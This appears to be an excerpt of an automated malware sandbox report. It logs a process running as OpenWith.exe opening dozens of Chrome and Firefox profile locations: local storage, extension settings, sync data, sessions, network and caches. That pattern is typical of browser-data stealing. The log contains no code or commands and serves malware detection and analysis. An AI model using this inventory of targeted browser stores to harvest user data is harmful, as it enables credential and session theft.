File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2 |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnails |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0 |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtab |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache |
Jump to behavior |